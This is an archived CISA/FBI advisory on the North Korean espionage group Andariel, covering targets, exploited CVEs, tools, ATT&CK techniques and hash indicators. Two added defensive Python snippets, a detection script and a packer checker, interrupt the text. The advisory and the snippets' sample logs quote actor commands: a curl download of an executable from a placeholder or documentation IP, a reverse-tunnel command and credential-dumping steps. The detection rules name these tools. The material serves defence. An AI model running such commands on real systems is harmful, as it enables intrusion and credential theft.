{
	"id": "c6ff3f3b-f638-4d98-83d2-a1a7cd88be4d",
	"created_at": "2026-04-06T00:21:29.994425Z",
	"updated_at": "2026-04-10T13:11:34.336449Z",
	"deleted_at": null,
	"sha1_hash": "efa6aec67591c9eadc36060479de75e1d3c90321",
	"title": "North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 270496,
	"plain_text": "North Korea Cyber Group Conducts Global Espionage Campaign\r\nto Advance Regime’s Military and Nuclear Programs | CISA\r\nPublished: 2024-07-25 · Archived: 2026-04-05 16:09:15 UTC\r\nThe U.S. Federal Bureau of Investigation (FBI) and the following authoring partners are releasing this\r\nCybersecurity Advisory to highlight cyber espionage activity associated with the Democratic People’s Republic of\r\nKorea (DPRK)’s Reconnaissance General Bureau (RGB) 3rd Bureau based in Pyongyang and Sinuiju:\r\nThe RGB 3rd Bureau includes a DPRK (aka North Korean) state-sponsored cyber group known publicly as\r\nAndariel , Onyx Sleet (formerly PLUTONIUM), DarkSeoul, Silent Chollima, and Stonefly/Clasiopa. The\r\ngroup primarily targets defense, aerospace, nuclear, and engineering entities to obtain sensitive and classified\r\ntechnical information and intellectual property to advance the regime’s military and nuclear programs and\r\nambitions. The authoring agencies believe the group and the cyber techniques remain an ongoing threat to various\r\nindustry sectors worldwide, including but not limited to entities in their respective countries, as well as in Japan\r\nand India. RGB 3rd Bureau actors fund their espionage activity through ransomware operations against U.S.\r\nhealthcare entities.\r\nThe actors gain initial access through widespread exploitation of web servers through known vulnerabilities in\r\nsoftware, such as Log4j, to deploy a web shell and gain access to sensitive information and applications for further\r\nexploitation. The actors then employ standard system discovery and enumeration techniques, establish persistence\r\nusing Scheduled Tasks, and perform privilege escalation using common credential stealing tools such as\r\nMimikatz. The actors deploy and leverage custom malware implants, remote access tools (RATs), and open source\r\ntooling for execution, lateral movement, and data exfiltration. 
\r\nThe actors also conduct phishing activity using malicious attachments, including Microsoft Windows Shortcut\r\nFile (LNK) files or HTML Application (HTA) script files inside encrypted or unencrypted zip archives.\r\nThe authoring agencies encourage critical infrastructure organizations to apply patches for vulnerabilities in a\r\ntimely manner, protect web servers from web shells, monitor endpoints for malicious activities, and strengthen\r\nauthentication and remote access protections. While not exclusive, entities involved in or associated with the\r\nbelow industries and fields should remain vigilant in defending their networks from North Korea state-sponsored\r\ncyber operations:\r\nAndariel (also known as Onyx Sleet, formerly PLUTONIUM, DarkSeoul, Silent Chollima, and\r\nStonefly/Clasiopa) is a North Korean state-sponsored cyber group, under the RGB 3rd Bureau, based in\r\nPyongyang and Sinuiju. The authoring agencies assess the group has evolved from conducting destructive attacks\r\ntargeting U.S. and South Korean organizations to conducting specialized cyber espionage and ransomware\r\noperations.\r\nThe actors currently target sensitive military information and intellectual property of defense, aerospace, nuclear,\r\nand engineering organizations. To a lesser extent, the group targets medical and energy industries. See Table 1 for\r\nmore victimology information.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 1 of 31\n\nTable 1. 
Andariel Cyber Espionage Victimology\r\nIndustry      Information Targeted\r\nDefense       Heavy and light tanks and self-propelled howitzers\r\n              Light strike vehicles and ammunition supply vehicles\r\n              Littoral combat ships and combatant craft\r\n              Submarines, torpedoes, unmanned underwater vehicles (UUVs), and autonomous underwater vehicles (AUVs)\r\n              Modeling and simulation services\r\nAerospace     Fighter aircraft and unmanned aerial vehicles (UAVs)\r\n              Missiles and missile defense systems\r\n              Satellites, satellite communications, and nano-satellite technology\r\n              Surveillance radar, phased-array radar, and other radar systems\r\nNuclear       Uranium processing and enrichment\r\n              Material waste and storage\r\n              Nuclear power plants\r\n              Government nuclear facilities and research institutes\r\nEngineering   Shipbuilding and marine engineering\r\n              Robot machinery and mechanical arms\r\n              Additive manufacturing and 3D printing components and technology\r\n              Casting, fabrication, high-heat metal molding, and rubber and plastic molding\r\n              Machining processes and technology\r\nThe information targeted—such as contract specifications, bills of materials, project details, design drawings, and\r\nengineering documents—has military and civilian applications and leads the authoring agencies to assess one of\r\nthe group’s chief responsibilities as satisfying collection requirements for Pyongyang’s nuclear and defense\r\nprograms.\r\nRansomware\r\nAndariel actors fund their espionage activity through ransomware operations against U.S. healthcare entities, and\r\nin some instances, the authoring agencies have observed the actors launching ransomware attacks and conducting\r\ncyber espionage operations on the same day and/or leveraging ransomware and cyber espionage against the same\r\nentity. 
For more information on this ransomware activity, see joint advisories #StopRansomware: Ransomware Attacks on\r\nCritical Infrastructure Fund DPRK Malicious Cyber Activities and North Korean State-Sponsored\r\nCyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector.\r\nMalicious Cyber Espionage Activity\r\nThis advisory uses the MITRE ATT\u0026CK for Enterprise framework, version 15. See the Appendix: MITRE\r\nATT\u0026CK Techniques for all referenced tactics and techniques.\r\nReconnaissance and Enumeration\r\nWhile there is limited available information on the group’s initial reconnaissance methods, the actors likely\r\nidentify vulnerable systems using publicly available internet scanning tools that reveal information such as\r\nvulnerabilities in public-facing web servers [T1595, T1592]. The actors gather open source information about\r\ntheir victims for use in targeting [T1591] and research Common Vulnerabilities and Exposures (CVEs) when\r\npublished to the National Institute of Standards and Technology (NIST) National Vulnerability Database [T1596]. 
CVEs researched include:\r\nCVE-2023-46604 – Apache ActiveMQ\r\nCVE-2023-42793 – TeamCity\r\nCVE-2023-3519 – Citrix NetScaler\r\nCVE-2023-35078 – Ivanti Endpoint Manager Mobile (EPMM)\r\nCVE-2023-34362 – MOVEit\r\nCVE-2023-33246 – RocketMQ\r\nCVE-2023-32784 – KeePass\r\nCVE-2023-32315 – Openfire\r\nCVE-2023-3079 – Google Chromium V8 Type Confusion\r\nCVE-2023-28771 and CVE-2023-33010 – Zyxel firmware\r\nCVE-2023-2868 – Barracuda Email Security Gateway\r\nCVE-2023-27997 – FortiGate SSL VPN\r\nCVE-2023-25690 – Apache HTTP Server\r\nCVE-2023-21932 – Oracle Hospitality Opera 5\r\nCVE-2023-0669 – GoAnywhere MFT\r\nCVE-2022-47966 – ManageEngine\r\nCVE-2022-41352 and CVE-2022-27925 – Zimbra Collaboration Suite\r\nCVE-2022-30190 – Microsoft Windows Support Diagnostic Tool\r\nCVE-2022-25064 – TP-Link\r\nCVE-2022-24990 and CVE-2021-45837 – TerraMaster NAS\r\nCVE-2022-24785 – Moment.js\r\nCVE-2022-24665, CVE-2022-24664, and CVE-2022-24663 – PHP Everywhere\r\nCVE-2022-22965 – Spring4Shell\r\nCVE-2022-22947 – Spring Cloud Gateway\r\nCVE-2022-22005 – Microsoft SharePoint Server\r\nCVE-2022-21882 – Win32k Elevation of Privilege\r\nCVE-2021-44228 – Apache Log4j\r\nCVE-2021-44142 – Samba vfs_fruit module\r\nCVE-2021-43226, CVE-2021-43207, and CVE-2021-36955 – Windows log file vulnerabilities\r\nCVE-2021-41773 – Apache HTTP Server 2.4.49\r\nCVE-2021-40684 – Talend ESB Runtime\r\nCVE-2021-3018 – IPeakCMS 3.5\r\nCVE-2021-20038 – SMA100 Apache httpd server (SonicWall)\r\nCVE-2021-20028 – SonicWall Secure Remote Access (SRA)\r\nCVE-2019-15637 – Tableau\r\nCVE-2019-7609 – Kibana\r\nCVE-2019-0708 – Microsoft Remote Desktop Services\r\nCVE-2017-4946 – VMware V4H and V4PA\r\nResource Development, Tooling, and Remote Access Tools\r\nThe actors leverage custom tools and malware for discovery and execution. 
Over the last 15 years, the group has\r\ndeveloped RATs, including the following, to permit remote access and manipulation of systems and lateral\r\nmovement.\r\nAtharvan\r\nELF Backdoor\r\nJupiter\r\nMagicRAT\r\n“No Pineapple”\r\nTigerRAT\r\nValefor/VSingle\r\nValidAlpha\r\nYamaBot\r\nNukeSped\r\nGoat RAT\r\nBlack RAT\r\nAndarLoader\r\nDurianBeacon\r\nTrifaux\r\nKaosRAT\r\nPreft\r\nAndariel Scheduled Task Malware\r\nBottomLoader (see Cisco Talos blog Operation Blacksmith)\r\nNineRAT (see Cisco Talos blog Operation Blacksmith)\r\nDLang (see Cisco Talos blog Operation Blacksmith)\r\nNestdoor (see AhnLab blog)\r\nThese tools include functionality for executing arbitrary commands, keylogging, screenshots, listing files and\r\ndirectories, browser history retrieval, process snooping, creating and writing to files, capturing network\r\nconnections, and uploading content to command and control (C2) [T1587.001, T1587.004]. The tools allow\r\nthe actors to maintain access to the victim system, with each implant having a designated C2 node.\r\nCommodity Malware and Dual-Use Applications\r\nCommodity malware is malicious software widely available for purchase or use and is leveraged by numerous\r\ndifferent threat actors. Dual-use applications are software tools widely available for purchase or use that are\r\ncommonly utilized by administrators and users for system administration or other legitimate purposes and also by\r\nthreat actors for malicious activities. These dual-use applications may reside locally, known as Living Off the\r\nLand (LOTL) tools, or be transferred to the target system during the attack. The use of publicly available malware\r\nand dual-use applications enables the actors to conceal and obfuscate their identities and leads to attribution problems. 
The authoring agencies are reliant on the\r\nuse of custom malware and loaders, along with overlapping C2 nodes, to attribute commodity malware to the\r\nactors. The actors have at times achieved great success obfuscating their identities by leveraging open source\r\nmalware. The authoring agencies have identified the following open-source and dual-use tools as used and/or\r\ncustomized by the actors:\r\n3Proxy [T1090]\r\nAdFind [S0552]\r\nAsyncRAT\r\nDeimosC2\r\nImpacket [T1090]\r\nJuggernaut [T1040]\r\nLilith RAT\r\nORVX Web Shell\r\nMimikatz [S0002]\r\nPLINK [T1572]\r\nProcDump [T1003]\r\nPuTTY [T1572]\r\nSOCKS5 [T1090]\r\nStunnel [T1572]\r\nWeb Shell by Orb (WSO)\r\nWinRAR [T1560]\r\nWinSCP [T1048]\r\nRDP Wrapper [T1572]\r\nInitial Access\r\nThe actors gain initial access through widespread exploitation of web servers through known vulnerabilities, such\r\nas CVE-2021-44228 (“Log4Shell”) in Apache’s Log4j software library and other CVEs listed above, to deploy\r\nweb shells and gain access to sensitive information and applications for further exploitation. The actors continue\r\nto breach organizations by exploiting web server vulnerabilities in public-facing devices and have conducted\r\nwidespread activity against a number of different organizations simultaneously [T1190].\r\nExecution\r\nThe actors are well-versed in using native tools and processes on systems, known as living off the land (LOTL).\r\nThey use Windows command line, PowerShell, Windows Management Instrumentation command line (WMIC),\r\nand Linux bash for system, network, and account enumeration. While individual commands typically vary, the\r\nauthoring agencies assess the actors prefer netstat commands, such as netstat -naop and netstat -noa\r\n[T1059]. 
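The enumeration and staging commands this section describes, together with the vssadmin and credential-dumping activity described under Credential Access below and the PuTTY/WinSCP transfers under Collection and Exfiltration, are a natural source of process-creation detections. The following Python is an added example written for this page, not tooling from the advisory or the authoring agencies: it runs command-line regexes over constructed process-creation events and groups hits per host with the highest severity seen. The rule names, severities, host names, the 198.51.100.23 address and every event line are invented for the example.

```python
import re
from collections import defaultdict

# Command-line patterns derived from the commands and tools the advisory attributes
# to RGB 3rd Bureau actors. Rule names and severities are this example's own.
RULES = [
    ('netstat_enum',      'low',      r'(?i)(^|\s)netstat(\.exe)?\s+-(naop|noa)\b'),
    ('systeminfo_logon',  'medium',   r'(?i)systeminfo\s*\|\s*findstr\s+logon'),
    ('curl_to_public',    'high',     r'(?i)(^|\s)curl(\.exe)?\s.*\s-o\s+\S*\\users\\public\\'),
    ('reverse_tunnel_pw', 'high',     r'\s-R\s+\S+:\d+\s.*\s-pw\s+\S+'),   # plink-style, case-sensitive switches
    ('vss_shadow_create', 'high',     r'(?i)(^|\s)vssadmin(\.exe)?\s+create\s+shadow'),
    ('ntds_dit_access',   'critical', r'(?i)ntds\.dit'),
    ('cred_dump_tool',    'critical', r'(?i)(^|\\|\s)(mimikatz|procdump(64)?)(\.exe)?\b'),
]
COMPILED = [(name, sev, re.compile(rx)) for name, sev, rx in RULES]
SEVERITY_ORDER = ['low', 'medium', 'high', 'critical']

# Constructed process-creation events (tab separated: time, host, user, command line).
# Synthetic lines written for this example, not telemetry from any real incident;
# 198.51.100.23 is a documentation address.
SAMPLE_LOG = '\n'.join([
    '2024-07-01T09:12:03Z\tWEB01\tNT AUTHORITY\\SYSTEM\tnetstat -naop',
    '2024-07-01T09:12:41Z\tWEB01\tNT AUTHORITY\\SYSTEM\tC:\\windows\\system32\\cmd.exe /c systeminfo | findstr Logon',
    '2024-07-01T09:15:10Z\tWEB01\tNT AUTHORITY\\SYSTEM\tcurl http://198.51.100.23/tmp/tmp/comp.dat -o c:\\users\\public\\notify.exe',
    '2024-07-01T09:20:55Z\tWEB01\tNT AUTHORITY\\SYSTEM\tpvhost.exe -N -R 198.51.100.23:8443 -P 443 -l svc -pw Summer2024! 198.51.100.23',
    '2024-07-01T10:02:17Z\tDC01\tCORP\\svc_backup\tvssadmin create shadow /for=C:',
    '2024-07-01T10:03:02Z\tDC01\tCORP\\svc_backup\tcopy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\ntds.dit c:\\users\\public\\n.dat',
    '2024-07-01T10:05:40Z\tDC01\tCORP\\svc_backup\tprocdump64.exe -accepteula -ma lsass.exe c:\\users\\public\\l.dmp',
    '2024-07-01T11:30:00Z\tFS02\tCORP\\jdoe\tnetstat -an',
    '2024-07-01T11:31:44Z\tFS02\tCORP\\jdoe\tcurl https://updates.example.com/patch.msi -o C:\\Temp\\patch.msi',
])


def parse_events(log_text):
    """Parse the tab-separated constructed log; Sysmon EID 1 or EDR process events
    carry the same four fields under other names."""
    events = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        time, host, user, cmdline = raw.split('\t', 3)
        events.append({'time': time, 'host': host, 'user': user, 'cmdline': cmdline})
    return events


def triage(log_text):
    """Return one finding per (event, rule) pair whose regex matches the command line."""
    findings = []
    for ev in parse_events(log_text):
        for name, severity, rx in COMPILED:
            if rx.search(ev['cmdline']):
                findings.append({**ev, 'rule': name, 'severity': severity})
    return findings


def summarize(findings):
    """Per host: sorted rule names and the highest severity seen, so a responder
    sees the chain (enumerate, stage, tunnel, dump) on one machine at a glance."""
    per_host = defaultdict(lambda: {'rules': set(), 'max_severity': 'low'})
    for f in findings:
        entry = per_host[f['host']]
        entry['rules'].add(f['rule'])
        if SEVERITY_ORDER.index(f['severity']) > SEVERITY_ORDER.index(entry['max_severity']):
            entry['max_severity'] = f['severity']
    return {h: {'rules': sorted(e['rules']), 'max_severity': e['max_severity']}
            for h, e in per_host.items()}


if __name__ == '__main__':
    for f in triage(SAMPLE_LOG):
        print('%-8s %-6s %-18s %s' % (f['severity'], f['host'], f['rule'], f['cmdline']))
```

The patterns key on the actors' switch combinations (netstat -naop, curl with -o into the public user profile directory, a plink-style -R ... -pw reverse tunnel) rather than on netstat or curl alone, which are legitimate on most servers; shadow-copy creation, NTDS.dit access and procdump against lsass are rare enough on member servers to carry a high or critical severity by themselves.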
Example commands used by the actors include the following:\r\nnetstat -naop\r\nnetstat -noa\r\npvhost.exe -N -R [IP Address]:[Port] -P [Port] -l [username] -pw [password] \u003cRemote_IP\u003e\r\ncurl hxxp[://][IP Address]/tmp/tmp/comp[.]dat -o c:\\users\\public\\notify[.]exe\r\nC:\\windows\\system32\\cmd.exe /c systeminfo | findstr Logon\r\nThese actors often make typos and other mistakes, indicating that the commands are not directly copied from a\r\nplaybook and that the actors have a flexible and impromptu approach. The typos also illustrate a poor grasp of the\r\nEnglish language, including common errors such as “Microsoft Cooperation” (rather than “Microsoft\r\nCorporation”) found across numerous RGB 3rd Bureau malware samples.\r\nDefense Evasion\r\nThe actors routinely pack late-stage tooling with VMProtect and Themida. Malicious tooling packed with these and\r\nother commercial packers has advanced anti-debugging and anti-detection capabilities. These files are typically multiple\r\nmegabytes in size and often contain unusual file section names, such as vmp0 and vmp1 for VMProtect, or\r\nrandomized file section names for Themida [T1027].\r\nCredential Access\r\nThe actors employ a multi-pronged approach to stealing credentials to gain additional access to systems, including\r\nthe use of publicly available credential theft utilities and dual-use tools such as Mimikatz, Dumpert, and\r\nProcDump, and accessing the Active Directory domain database by targeting the NTDS.dit file. The\r\nauthoring agencies assess the actors change settings on compromised systems to force the system to store\r\ncredentials and then use the aforementioned tools to steal credentials. In one instance, the actors used the\r\nvssadmin command-line utility to back up a volume to retrieve a copy of the NTDS.dit file containing Active\r\nDirectory data. 
In another instance, the actors were observed collecting registry hive data for offline extraction of\r\ncredentials [T1003].\r\nDiscovery\r\nThe actors used customized file system enumeration tooling written in .NET. The tool is capable of receiving and\r\nexecuting command line arguments to enumerate directories and files and compress output files. The tool collects\r\nthe following information for each drive targeted on a system: depth relative to starting path, name, last write\r\ntime, last access time, creation time, size, and attributes [T1087, T1083].\r\nThe actors also enumerate directories and files of connected devices using the Server Message Block (SMB) protocol,\r\nwhich enables network file sharing and the ability to request services and programs from a network [T1021.002].\r\nLateral Movement\r\nThe actors also use system logging for discovery to move laterally. The group logs active window changes,\r\nclipboard data, and keystrokes and saves the collected logging information to the %Temp% directory.\r\nThe actors have also used Remote Desktop Protocol (RDP) to move laterally [T1021].\r\nCommand and Control\r\nThe actors leverage techniques and infrastructure positioned around the world to send commands to compromised\r\nsystems. The actors disguise their malware within HTTP packets to appear as benign network traffic. They also\r\nuse tunneling tools such as 3Proxy, PLINK, and Stunnel as well as custom proxy tunneling tools to tunnel traffic\r\nover a variety of protocols from inside a network back to a C2 server. 
Tunneling enables the actors to perform C2\r\noperations despite network configurations that would typically pose a challenge, such as the use of Network\r\nAddress Translation (NAT) or traffic funneled through a web proxy [T1090, T1071].\r\nCollection and Exfiltration\r\nMalware previously used by the actors permitted placement and access to search through files that could be of\r\ninterest, including scanning computer files for keywords related to defense and military sectors in English and\r\nKorean. The actors identify data for theft by enumerating files and folders across many directories and servers\r\nusing command-line activity or functionality built into custom tools. The actors collect the relevant files into RAR\r\narchives, sometimes using a version of WinRAR brought into the victim’s environment with other malicious\r\ntooling [T1560, T1039].\r\nThe actors typically exfiltrate data to web services such as cloud storage or servers not associated with their\r\nprimary C2. Notably, the actors have been observed logging into actor-controlled cloud-based storage service\r\naccounts directly from victim networks to exfiltrate data [T1567]. 
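The Defense Evasion section above notes that the actors' late-stage tooling is packed with VMProtect or Themida and carries section names such as vmp0 and vmp1, or randomized section names; the INDICATOR_EXE_Packed_VMProtect and INDICATOR_EXE_Packed_Themida rules in Table 2 check the same thing with the YARA pe module. The following Python is an added example, not code from the advisory: it parses just enough of the PE header to list section names using only the standard library and returns a triage verdict. The set of benign section names is this example's own heuristic list, and the header-only PE image it builds for demonstration is constructed here rather than taken from any sample.

```python
import struct

# Section names routinely emitted by MSVC/MinGW/Go/Rust toolchains and Windows drivers.
# Anything outside this list is a triage lead, not proof of packing.
# (Heuristic list assembled for this example.)
KNOWN_SECTION_NAMES = {
    '.text', '.rdata', '.data', '.pdata', '.idata', '.edata', '.rsrc', '.reloc',
    '.tls', '.bss', '.CRT', '.gfids', '.00cfg', '.xdata', '.didat', '.textbss',
    '.sxdata', '.voltbl', '.retplne', 'CODE', 'DATA', 'BSS', 'INIT', 'PAGE',
}

# Names the advisory ties to the two commercial packers (Defense Evasion section and
# the INDICATOR_EXE_Packed_VMProtect / INDICATOR_EXE_Packed_Themida rules in Table 2).
PACKER_SECTION_NAMES = {'.vmp0': 'VMProtect', '.vmp1': 'VMProtect', '.themida': 'Themida'}


def section_names(data):
    """Return the section names of a PE image by walking DOS header -> NT headers ->
    section table. Only the headers are read, so a partial file read is enough."""
    if len(data) < 0x40 or data[:2] != b'MZ':
        raise ValueError('no MZ header')
    e_lfanew = struct.unpack_from('<I', data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b'PE\x00\x00':
        raise ValueError('no PE signature at e_lfanew')
    coff = e_lfanew + 4                                    # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from('<H', data, coff + 2)[0]
    opt_size = struct.unpack_from('<H', data, coff + 16)[0]
    table = coff + 20 + opt_size                           # first IMAGE_SECTION_HEADER
    names = []
    for i in range(num_sections):
        raw = data[table + 40 * i:table + 40 * i + 8]      # Name is the first 8 bytes
        if len(raw) < 8:
            raise ValueError('section table truncated')
        names.append(raw.split(b'\x00', 1)[0].decode('latin-1'))
    return names


def packer_verdict(names):
    """Classify a section-name list the way the advisory's packer indicators do."""
    packers = sorted({PACKER_SECTION_NAMES[n] for n in names if n in PACKER_SECTION_NAMES})
    unusual = [n for n in names if n not in KNOWN_SECTION_NAMES and n not in PACKER_SECTION_NAMES]
    return {'packers': packers, 'unusual_sections': unusual,
            'suspicious': bool(packers) or bool(unusual)}


def packer_report(data):
    """Header-only scan of one file's bytes; parse failures become a field, not an exception."""
    try:
        names = section_names(data)
    except (ValueError, struct.error) as exc:
        return {'error': str(exc)}
    return {'sections': names, **packer_verdict(names)}


def build_synthetic_pe(names):
    """Build a header-only PE32+ image with the given section names. Constructed test
    input for the parser, not a real binary."""
    dos = b'MZ' + b'\x00' * 58 + struct.pack('<I', 0x40)           # e_lfanew = 0x40
    opt_size = 240                                                  # PE32+ optional header size
    coff = struct.pack('<HHIIIHH', 0x8664, len(names), 0, 0, 0, opt_size, 0x22)
    headers = b''.join(n.encode('latin-1').ljust(8, b'\x00') + b'\x00' * 32 for n in names)
    return dos + b'PE\x00\x00' + coff + b'\x00' * opt_size + headers


if __name__ == '__main__':
    import sys
    if sys.argv[1:]:
        for path in sys.argv[1:]:
            with open(path, 'rb') as fh:
                print(path, packer_report(fh.read(1 << 16)))
    else:
        print(packer_report(build_synthetic_pe(['.text', '.rdata', '.vmp0', '.vmp1'])))
```

Run it over a directory of dropped files to shortlist candidates for the YARA rules in Table 2; a hit on .vmp0/.vmp1 or .themida reproduces the INDICATOR_EXE_Packed_* section-name checks, and a list of non-standard names is the cue the advisory gives for Themida's randomized sections.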
The actors have also been observed using the\r\nutilities PuTTY and WinSCP to exfiltrate data to North Korea-controlled servers via File Transfer Protocol (FTP)\r\nand other protocols [T1048].\r\nThe actors have also been identified staging files for exfiltration on victim machines, establishing Remote\r\nDesktop Protocol connections, and conducting HTTP GET requests on port 80 to receive information [T1021].\r\nIndicators of Compromise\r\nSee below for Andariel IOCs.\r\nThe following include observed MD5 hashes:\r\n88a7c84ac7f7ed310b5ee791ec8bd6c5\r\n6ab4eb4c23c9e419fbba85884ea141f4\r\n97ce00c7ef1f7d98b48291d73d900181\r\n079b4588eaa99a1e802adf5e0b26d8aa\r\n0873b5744d8ab6e3fe7c9754cf7761a3\r\n0d696d27bae69a62def82e308d28857a\r\n0ecf4bac2b070cf40f0b17e18ce312e6\r\n17c46ed7b80c2e4dbea6d0e88ea0827c\r\n1f2410c3c25dadf9e0943cd634558800\r\n2968c20a07cfc97a167aa3dd54124cda\r\n33e85d0f3ef2020cdb0fc3c8d80e8e69\r\n4118d9adce7350c3eedeb056a3335346\r\n4aa57e1c66c2e01f2da3f106ed2303fa\r\n58ad3103295afcc22bde8d81e77c282f\r\n5c41cbf8a7620e10f158f6b70963d1cb\r\n61a949553d35f31957db6442f36730c5\r\n72a22afde3f820422cfdbba7a4cbabde\r\n84bd45e223b018e67e4662c057f2c47e\r\n86465d92f0d690b62866f52f5283b9fc\r\n8b395cc6ecdec0900facf6e93ec48fbb\r\n97f352e2808c78eef9b31c758ca13032\r\na50f3b7aa11b977ae89285b60968aa67\r\nafd25ce56b9808c5ed7eade75d2e12a7\r\nafdeb24975a318fc5f20d9e61422a308\r\nb697b81b341692a0b137b2c748310ea7\r\nbcac28919fa33704a01d7a9e5e3ddf3f\r\nc027d641c4c1e9d9ad048cda2af85db6\r\nc892c60817e6399f939987bd2bf5dee0\r\ncdeae978f3293f4e783761bc61b34810\r\nd0f310c99476f1712ac082f78dd29fdc\r\nd8da33fae924b991b776797ba8cde24c\r\ne230c5728f9ea5a94e390e7da7bf1ffa\r\nf4d46629ca15313b94992f3798718df7\r\nfb84a392601fc19aeb7f8ce11b3a4907\r\nff3194d3d5810a42858f3e22c91500b1\r\n13b4ce1fc26d400d34ede460a8530d93\r\n41895c5416fdc82f7e0babc6bb6c7216\r\nc2f8c9bb7df688d0a7030a96314bb493\r\n33a3da2de78418b89a603
e28a1e8852c\r\n4896da30a745079cd6265b6332886d45\r\n73eb2f4f101aab6158c615094f7a632a\r\n7f33d2d2a2ce9c195202acb59de31eee\r\ne1afd01400ef405e46091e8ef10c721c\r\nfe25c192875ec1914b8880ea3896cda2\r\n232586f8cfe82b80fd0dfa6ed8795c56\r\nc1f266f7ec886278f030e7d7cd4e9131\r\n49bb2ad67a8c5dfbfe8db2169e6fa46e\r\nbeb199b15bd075996fa8d6a0ed554ca8\r\n4053ca3e37ed1f8d37b29eed61c2e729\r\n3a0c8ae783116c1840740417c4fbe678\r\n0414a2ab718d44bf6f7103cff287b312\r\nca564428a29faf1a613f35d9fa36313f\r\nad6d4eb34d29e350f96dc8df6d8a092e\r\ndc70dc9845aa747001ebf2a02467c203\r\n3d2ec58f37c8176e0dbcc47ff93e5a76\r\n0a09b7f2317b3d5f057180be6b6d0755\r\n1ffccc23fef2964e9b1747098c19d956\r\n9112efb49cae021abebd3e9a564e6ca4\r\nac0ada011f1544aa3a1cf27a26f2e288\r\n0211a3160cc5871cbcd4e5514449162b\r\n7416ea48102e2715c87edd49ddbd1526\r\na2aefb7ab6c644aa8eeb482e27b2dbc4\r\ne7fd7f48fbf5635a04e302af50dfb651\r\n33b2b5b7c830c34c688cf6ced287e5be\r\ne5410abaaac69c88db84ab3d0e9485ac\r\neb35b75369805e7a6371577b1d2c4531\r\n5a3f3f75048b9cec177838fb8b40b945\r\n9d7bd0caed10cc002670faff7ca130f5\r\n8434cdd34425916be234b19f933ad7ea\r\nbbaee4fe73ccff1097d635422fdc0483\r\n79e474e056b4798e0a3e7c60dd67fd28\r\n95c276215dcc1bd7606c0cb2be06bf70\r\n426bb55531e8e3055c942a1a035e46b9\r\ncfae52529468034dbbb40c9a985fa504\r\ndeae4be61c90ad6d499f5bdac5dad242\r\nbda0686d02a8b7685adf937cbcd35f46\r\n6de6c27ca8f4e00f0b3e8ff5185a59d1\r\nc61a8c4f6f6870c7ca0013e084b893d2\r\n5291aed100cc48415636c4875592f70c\r\nf4795f7aec4389c8323f7f40b50ae46f\r\ncf1a90e458966bcba8286d46d6ab052c\r\n792370eb01e16ac3dc511143932d0e1d\r\n612538328e0c4f3e445fb58ef811336a\r\n9767aa592ec2d6ae3c7d40b6049d0466\r\nb22fd0604c4f189f2b7a59c8f48882dd\r\ne53ca714787a86c13f07942a56d64efa\r\nc7b09f1dd0a5694de677f3ecceda41b7\r\nc8346b39418f92725719f364068a218d\r\n730bff14e80ffd7737a97cdf11362ab5\r\n9a481bc83fea1dea3e3bdfff5e154d44\r\nddb1f970371fa32faae61fc5b8423d4b\r\n6c2b947921e7c77d9af62ce9a3ed7621\r\n977d30b261f64cc582b48960909d0a89\r\n7ce51b56a6b0f8f78056ddfc5b5de67c\r\ndd9625be4a1201c6dfb205c12cf3a381\r\necb4a09618e2aba77ea37bd011d7d7f7\r\n0fd8c6f56c52c21c061a94e5765b27b4\r\nc90d094a8fbeaa8a0083c7372bfc1897\r\n0055a266aa536b2fdadb3336ef8d4fba\r\n55bb271bbbf19108fec73d224c9b4218\r\n0c046a2f5304ed8d768795a49b99d6e4\r\nf34664e0d9a10974da117c1ca859dba8\r\na2c2099d503fcc29478205f5aef0283b\r\ne439f850aa8ead560c99a8d93e472225\r\n7c30ed6a612a1fd252565300c03c7523\r\n81738405a7783c09906da5c7212e606b\r\neb7ba9f7424dffdb7d695b00007a3c6d\r\n3e9ee5982e3054dc76d3ba5cc88ae3de\r\n073e3170a8e7537ff985ec8316319351\r\n9b0e7c460a80f740d455a7521f0eada1\r\n2d02f5499d35a8dffb4c8bc0b7fec5c2\r\n0984954526232f7d05910aa5b07c5893\r\n4156a7283284ece739e1bae05f99e17c\r\n3026d419ee140f3c6acd5bff54132795\r\n7aa132c0cc63a38fb4d1789553266fc7\r\n1a0811472fad0ff507a92c957542fffd\r\nf8aef59d0c5afe8df31e11a1984fbc0a\r\n82491b42b9a2d34b13137e36784a67d7\r\n0a199944f757d5615164e8808a3c712a\r\n9c97ea18da290a6833a1d36e2d419efc\r\n16f768eac33f79775a9672018e0d64f5\r\nThe following include observed SHA-256 hashes:\r\ned8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6\r\ndb6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984\r\n773760fd71d52457ba53a314f15dddb1a74e8b2f5a90e5e150dea48a21aa76df\r\n05e9fe8e9e693cb073ba82096c291145c953ca3a3f8b3974f9c66d15c1a3a11d\r\ne3027062e602c5d1812c039739e2f93fc78341a67b77692567a4690935123abe\r\n1962ebb7bf8d2b306c6f3b55c3dcd69a755eeff1a17577b7606894b781841c3a\r\nf226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb\r\n6db57bbc2d07343dd6ceba0f53c73756af78f09fe1cb5ce8e8008e5e7242eae1\r\nb7435d23769e79fcbe69b28df4aef062685d1a631892c2354f96d833eae467be\r\n66415464a0795d0569efa5cb5664785f74ed0b92a593280d689f3a2ac68dca66\r\ndef2f01fbd4be85f48101e5ab7ddd82efb720e67daa6838f30fd8dcda1977563\r\n323cbe7a3d050230cfaa822c2a22160b4f8c5fe65481dd329841ee2754b522d9\r\n74529dd15d1953a47f0d7ecc2916b2b92865274a106e453a24943ca9ee434643\r\n1e4de822695570421eb2f12fdfe1d32ab8639655e12180a7ab3cf429e7811b8f\r\n8ce219552e235dcaf1c694be122d6339ed4ff8df70bf358cd165e6eb487ccfc5\r\nc2904dc8bbb569536c742fca0c51a766e836d0da8fac1c1abd99744e9b50164f\r\ndda53eee2c5cb0abdbf5242f5e82f4de83898b6a9dd8aa935c2be29bafc9a469\r\n90fb0cd574155f